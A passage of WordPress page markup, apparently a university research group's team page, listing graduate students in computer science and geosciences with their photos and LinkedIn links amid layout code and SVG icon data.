166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n            <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\" class=\"wp-image-1750 style-854-image style-local-182-c106-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c107\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg\" class=\"wp-image-1752 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\" class=\"wp-image-1754 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\" class=\"wp-image-1756 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg\" class=\"wp-image-1757 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\" class=\"wp-image-1758 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 